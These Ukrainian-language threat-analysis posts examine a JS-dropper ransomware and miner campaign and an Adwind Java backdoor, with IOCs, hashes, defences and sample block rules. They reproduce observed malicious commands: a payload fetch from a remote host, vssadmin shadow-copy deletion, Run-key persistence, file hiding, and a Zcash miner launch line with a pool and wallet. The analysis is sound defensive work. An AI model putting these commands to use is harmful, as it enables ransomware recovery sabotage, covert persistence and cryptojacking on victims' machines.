Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що компоненти Adwind детектуються DAT & GTI.

Схема атаки:

email > attach (ZIP) > JS >  WScript > URL > GET > AppData\Roaming\Microsoft\WIndows\Templates\%random%.exe

або

email > URL > GET > ZIP > JS >  WScript > URL > GET > AppData\Roaming\Microsoft\WIndows\Templates\%random%.exe

Маркери IOC:

File Name ✉ запрашиваемая Вами форма.js
SHA-256 Hash Identifier C3A4433120AB94AC0619670247A0D41B2051E2B9EA897884C323F62ABC872000
File Size 49240 bytes
File Type ASCII text

Запуск скрипта-приманки ініціює завантаження основного тіла:

194.24.182.138 80 HTTP contrast.com.ua GET /images/donckihot.jpg

Основне тіло являє собою додаток із розширенням .jpg

File Name donckihot.jpg
SHA-256 Hash Identifier 9B6667E567A5D2B86082EC3048A2F08D8F081F09049B2F2A932CFD803EDBC063
File Size 1027072 bytes

Яке записується та стартує із каталогу

%Username%\AppData\Roaming\Microsoft\Windows\Templates\%random%.exe

Копіює своє тіло у c:\programdata\windows\csrss.exe

Зразок проводить перевірку наявності та видалення існуючих тіньових копій:

C:\Windows\system32\vssadmin.exe List Shadows 
C:\Windows\system32\vssadmin.exe Delete Shadows /All /Quiet

Додає себе у автозавантаження

HCU\SOFTWARE\MS\Windows\CurrentVersion\Run\Client Server Runtime Subsystem c:\programdata\windows\csrss.exe

Ініціює зміну кодової сторінки

C:\Windows\system32\cmd.exe > chcp

Завантажує додатковий модуль у %tmp% та запускає його

“C:\tmp\749406EA.exe”

File Name 749406EA.exe
SHA-256 Hash Identifier CAAFBAC10D50D12F8852A9FD22DA3EA468C5658DBBEA61827EE6D6AEF7AF3D65
File Size 12407808 bytes

Який у свою чергу паралельно з процесом шифрування запускає на системі Bitcoin miner

File Name nheqminer.exe
SHA-256 Hash Identifier 8787D5D5E0C52183B60769DCA03087593870356AF632ADCABFFC2ACDFADBBD3A
File Size 643072 bytes
C:\PROGRA~3\SOFTWA~1\NHEQMI~1.EXE  -l eu1-zcash.flypool.org:3333 -u t1L9iBXyRgaYrQ5JSTSdstopV6pHtZ2Xdep.4C6A1A4F -t 1

Для закріплення майнера при перезавантаженні в автозапуск додається bat:

HCU\SOFTWARE\MS\Windows\CurrentVersion\Run\Command Line Support c:\programdata\syswow64\qw84q.cmd

Зміст bat файлу:

echo CreateObject("Wscript.Shell").Run "" ^& WScript.Arguments(0) ^& "", 0, False > "%TEMP%/JQZ3Cw.vbs" && start /WAIT wscript.exe "%TEMP%/JQZ3Cw.vbs" "C:\PROGRA~3\SOFTWA~1\NHEQMI~1.EXE -l eu1-zcash.flypool.org:3333 -u t1L9iBXyRgaYrQ5JSTSdstopV6pHtZ2Xdep.4C6A1A4F -t 1" && del "%TEMP%\JQZ3Cw.vbs"

Після шифрування мережева активність скомпрометованої системи виглядає так:

645030.exe 200 TCP 127.0.0.1 49215 127.0.0.1 49216 ESTABLISHED 
645030.exe 200 TCP 127.0.0.1 49216 127.0.0.1 49215 ESTABLISHED
645030.exe 200 TCP 10.0.2.15 49230 194.109.206.212 443 ESTABLISHED
645030.exe 200 TCP 10.0.2.15 49231 171.25.193.9 80 CLOSE_WAIT
645030.exe 200 TCP 10.0.2.15 49232 192.42.115.102 9004 ESTABLISHED
645030.exe 200 TCP 10.0.2.15 49233 62.210.244.146 9001 ESTABLISHED
645030.exe 200 TCP 10.0.2.15 49234 89.163.224.70 9001 ESTABLISHED
749406EA.exe 2772 TCP 127.0.0.1 49254 127.0.0.1 49255 ESTABLISHED
749406EA.exe 2772 TCP 127.0.0.1 49255 127.0.0.1 49254 ESTABLISHED
749406EA.exe 2772 TCP 10.0.2.15 49257 208.83.223.34 80 ESTABLISHED
749406EA.exe 2772 TCP 10.0.2.15 49258 193.23.244.244 443 ESTABLISHED
749406EA.exe 2772 TCP 10.0.2.15 49259 85.214.62.48 443 ESTABLISHED
749406EA.exe 2772 TCP 10.0.2.15 49260 51.15.48.254 443 ESTABLISHED
749406EA.exe 2772 TCP 10.0.2.15 49261 92.62.46.190 443 ESTABLISHED
749406EA.exe 2772 TCP 127.0.0.1 49262 127.0.0.1 62779 ESTABLISHED
749406EA.exe 2772 TCP 127.0.0.1 62779 127.0.0.1 49262 ESTABLISHED
NHEQMI~1.EXE 224 TCP 10.0.2.15 49256 94.23.20.210 3333 ESTABLISHED

Що можна було зробити аби уникнути шифрування ?

  1. Завантаження архіву з скриптом можна було завадити через блокування JS на proxy (як приклад через composite opener in Web Gateway)
  2. Запис JS приманки на диск (розпаковку) можна було попередити заборонивши створення JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу WSCript.exe (одне правило вбудованого брандмауера)
  5. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення .tmp та .exe файлів у каталозі профілю та %tmp% якщо не стандартний шлях (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 5 кроків, упередження хоча би одного з них = зупинка атаки.

Мережеві IOC:

194.24.182.138 80 HTTP contrast.com.ua GET /images/donckihot.jpg
194.109.206.212:443
171.25.193.9:80
192.42.115.102:9004
62.210.244.146:9001
89.163.224.70:9001
208.83.223.34:80
193.23.244.244:443
85.214.62.48:443
51.15.48.254:443
92.62.46.190:443
94.23.20.210:3333

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_Adwind_050917

Доброго дня, панове.

Вчора в першій половині дня було зафіксовано спробу доставки загрози типу Adwind (Java backdoor).

Він уже потрапляв в поле мого зору двічі: у червні 16го та у травні 17го.

Рівень загрози для систем на яких встановлено Java Runtimeвисокий.

В групі ризику – працівники бухгалтерії (ДБО) та користувачі самописного софту якому потрібен JRE.

Для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що компоненти Adwind детектуються DAT & GTI:

Трохи аналітики:

Я завжди виділяв даний клас загроз з поміж усіх зразків, які мені доводилося розбирати.

Причина полягає в тому, що 90% того мотлоху який щоденно тоннами розсилається у мережі не залежно від типу та форми обгортки (dropper) зводиться до примітивного – “завантажити / розпакувати / запустити .exe” (payload)

Відповідно, ті, хто звертають увагу не лише на IOC, а й на мої рекомендації, вже знають, що більшість складних/хитрих схем інфікування можна поламати через правила Acces Protection або деактивацію відповідних механізмів ОС, що дозволяє зупинити активність зразків на початковій стадії, не допускаючи значних ушкоджень системи жертви. (тут мова про сигнатури взагалі не йде бо в момент розсилки їх просто не буде)

Коли ми говоримо про Adwind потрібно вживати додаткових заходів захисту адже зразки цього типу в процесі інфікування не створюють нових запусних файлів, вони використовують встановлену JRE з дійсним цифровим підписом на яку через параметр подаються команди із файлу. Після закріплення уся активність на яку може звернути увагу технічний спеціаліст це присутність процесу javaw.exe (який досить легко сплутати з оновленнями Java) у автозавантаженні та періодична мережева активність від імені цього ж процесу – погодьтеся, що це не  буде виглядати підозрілим для системи, на якій активно використовуються Java додатки.

Даний клас зразків використовується для збору інформації, виведення облікових даних та віддаленого керування.

Схему атаки, маркери та перелік контрзаходів дивіться нижче.

Як і завжди основний принцип залишається незмінним – “Простіше упередити інфікування на ранній стадії аніж потім розбиратися із наслідками перебування шкідливого коду

Схема атаки:

email > attach (ZIP) > JAR > %temp%\*.class & *.vbs > %Userprofile%\Windows.reg\Update.scan

Маркери, IOC:

File Name PO-7235.jar
SHA-256 Hash Identifier 70ECF5D3EC5C876901BE635484E0137A31167143C9758DB52C54294810B27C14
File Size 558587 bytes
File Type application/x-java-archive; charset=binary

При запуску JAR файлу активується процес закріплення в системі:

"C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\Users\operator\Desktop\PO-7235.jar"

– зверніть увагу, в пам’ять системи завантажується оригінальний/дійсний файл Java, шкідливі інструкції подаються через параметр

"C:\Program Files\Java\jre7\bin\java.exe" -jar C:\tmp\_0.94455666565898946497103256142168062.class
"cmd.exe" /C cscript.exe C:\tmp\Retrive6049223750802148355.vbs
cscript.exe  C:\tmp\Retrive6049223750802148355.vbs
"cmd.exe" /C cscript.exe C:\tmp\Retrive7219502531594942910.vbs
cscript.exe  C:\tmp\Retrive7219502531594942910.vbs

– виконуючи шкідливий код Java видобуває із Jar архіву низку скриптових файлів необхідних для виконання закріплення в системі

"xcopy" "C:\Program Files\Java\jre7" "C:\Users\operator\AppData\Roaming\Oracle\" /e

– важливий момент – інструкціями передбачено дублювання запускних файлів JRE з Program Files у каталог %AppData%, це те, що має насторожити уважного адміна/ІБшника (про скрипти в %temp% я вже мовчу)

"cmd.exe" /C cscript.exe C:\tmp\Retrive5392694676028337177.vbs
cscript.exe  C:\tmp\Retrive5392694676028337177.vbs
"cmd.exe" /C cscript.exe C:\tmp\Retrive7999422219165629138.vbs
cscript.exe  C:\tmp\Retrive7999422219165629138.vbs
"xcopy" "C:\Program Files\Java\jre7" "C:\Users\operator\AppData\Roaming\Oracle\" /e

– – повторне копіювання, можливо для перестороги

"reg" add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v javaw.exe /t REG_EXPAND_SZ /d "\"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\operator\Windows.reg\Update.scan\"" /f

– запис у автозавантаження через HCU

"attrib" +h "C:\Users\operator\Windows.reg\*.*"
"attrib" +h "C:\Users\operator\Windows.reg"

– приховує свої файли через атрибути файлової системи

"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe" -jar C:\Users\operator\Windows.reg\Update.scan

– передача керування на файл з інструкціями з каталогу користувача

"C:\Users\operator\AppData\Roaming\Oracle\bin\java.exe" -jar C:\tmp\_0.89960564281661135816979970325922234.class
"cmd.exe" /C cscript.exe C:\tmp\Retrive1106571663555988847.vbs
cscript.exe  C:\tmp\Retrive1106571663555988847.vbs
"cmd.exe" /C cscript.exe C:\tmp\Retrive4075909662068347616.vbs
cscript.exe  C:\tmp\Retrive4075909662068347616.vbs
"cmd.exe" /C cscript.exe C:\tmp\Retrive810479841220532242.vbs
cscript.exe  C:\tmp\Retrive810479841220532242.vbs
"cmd.exe" /C cscript.exe C:\tmp\Retrive1722342620952052502.vbs
cscript.exe  C:\tmp\Retrive1722342620952052502.vbs

– запуск скриптів ініціює часткову зачистку слідів, відкриття мережевих з’єднань

"WMIC" /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List

– збір інформації про встановленні драйвери PnP пристроїв – може бути ознакою перевірки віртуального середовища або пошук апаратних ключів чи особливої ознаки (Scada контроллери чи POS пристрої) на відміну від зразка за 16й рік, який цікавився не драйверами а параметрами брандмауєра

Після закріплення в системі Adwind ініціює з’єднання із сервером контролю:

176.10.124.239 TCP 49189 → 8073 [PSH, ACK]

Що можна було зробити аби уникнути інфікування ?

  1. На системах робота яких не залежить від JRE, цей компонент можна та необхідно видалити – тоді код взагалі не запуститься
  2. Доставку JAR файлу можна було зупинити на рівні поштового шлюзу та proxy серверу (як приклад – Web та Email Gateway)
  3. Запис самого JAR в каталозі користувача можна заборонити відповідним правилом Access Protection
  4. Процес інфікування можна зупинити на початку, якщо застосувати правило заборони створення, запису та зчитування vbs файлів у каталозі %temp% (а краще AppData повністю)
  5. Якщо ж співробітнику потрібна і JRE і JAR файли, правилами AP можна заборонити процесу javaw зчитування та виконання JAR файлів із каталогу користувача – цей підхід теж досить дієвий (що правда тоді краще забороняти запуск і зчитування будь-яких файлів адже через параметр інструкції можуть подаватися з tmp )
  6. У кого наразі немає VSE/ENS із AP можуть деактивувати WSH – це поламає процес інфікування, але файли будуть створені і їх доведеться прибирати в ручному режимі або ж в автоматичному, але за допомогою MAR

Зразки правил ENS AP:

ENS \ Threat Protection \ Access Protection > Add

Description: anti_Adwind_VR

Action: +Block +Report

Executables: All (*.exe)

Subrules:

rule1 
BLK_appdata_exe block 
+Create +Execute 
**\Users\*\**\*.exe

rule2 
BLK_appdata_script_ 
+Write +Create +Execute +Read
**\Users\*\**\*.vbs
**\Users\*\**\*.js*
**\Users\*\**\*.wsf
**\Users\*\**\*.jar

Результат дії правил:

Як бачите, навіть при частковій забороні лише .vbs файлів зразок не додає себе в автозавантаження і зєднання із сервером контролю не проходить (так, файли залишаються і процеси активні, проте інформації про систему він вже не передає і перезавантаження не переживе – якщо тільки жертва не активує його сама повторно)

Мережеві IOC:

176.10.124.239 TCP 49189 → 8073 [PSH, ACK]

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування JAR файлів на рівні каналів передачі Web та Email
  • Інвентаризація встановленого ПЗ і видалення JRE там, де він не є критично потрібним
  • Заборона створення та зчитування/запуску *.JAR, *.VBS з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR